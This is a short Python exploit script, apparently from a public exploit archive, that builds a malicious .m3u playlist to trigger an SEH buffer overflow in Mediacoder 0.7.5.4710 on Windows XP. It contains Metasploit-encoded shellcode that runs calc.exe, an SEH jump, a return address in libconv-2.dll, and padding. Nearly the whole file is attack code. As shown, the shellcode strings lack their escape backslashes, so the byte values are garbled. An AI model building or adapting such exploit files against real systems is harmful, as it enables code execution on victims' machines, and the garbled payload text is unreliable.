#!/usr/bin/env python

#################################################################
#
# Mediacoder 0.7.5.4710 "Universal" SEH Buffer Overflow Exploit
# Coded By:     Dr_IDE
# Found By:	abhishek lyall
# Usage:        Load the evil .m3u file and click on it.
# Download:     http://www.exploit-db.com/application/14612
# Tested On:    Windows XPSP3
#
#################################################################

# windows/exec - 534 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe

code = (
"x89xe6xdaxdbxd9x76xf4x58x50x59x49x49x49x49"
"x43x43x43x43x43x43x51x5ax56x54x58x33x30x56"
"x58x34x41x50x30x41x33x48x48x30x41x30x30x41"
"x42x41x41x42x54x41x41x51x32x41x42x32x42x42"
"x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4b"
"x58x50x44x45x50x43x30x43x30x4cx4bx51x55x47"
"x4cx4cx4bx43x4cx45x55x43x48x45x51x4ax4fx4c"
"x4bx50x4fx45x48x4cx4bx51x4fx47x50x45x51x4a"
"x4bx51x59x4cx4bx50x34x4cx4bx45x51x4ax4ex50"
"x31x49x50x4dx49x4ex4cx4cx44x49x50x42x54x43"
"x37x49x51x49x5ax44x4dx43x31x48x42x4ax4bx4b"
"x44x47x4bx51x44x47x54x45x54x42x55x4bx55x4c"
"x4bx51x4fx46x44x43x31x4ax4bx42x46x4cx4bx44"
"x4cx50x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4c"
"x4bx45x4cx4cx4bx45x51x4ax4bx4dx59x51x4cx51"
"x34x45x54x48x43x51x4fx50x31x4ax56x43x50x51"
"x46x45x34x4cx4bx47x36x46x50x4cx4bx47x30x44"
"x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx43x58x45"
"x58x4bx39x4bx48x4bx33x49x50x43x5ax46x30x42"
"x48x4ax50x4cx4ax44x44x51x4fx42x48x4ax38x4b"
"x4ex4dx5ax44x4ex51x47x4bx4fx4ax47x42x43x45"
"x31x42x4cx45x33x45x50x41x41")

nseh = ("xEBx06xFFxFF")
retn = ("xC0x57x01x66")	#"Universal" P/P/R libconv-2.dll
nops = ("x90" * 12)
buff = ("x41" * 764)
junk = ("x44" * (2000-len(buff+nseh+retn+nops+code)))
 
file = open('dr_ide_SEH.m3u' , 'w')
file.write(buff + nseh + retn + nops + code + junk)
file.close()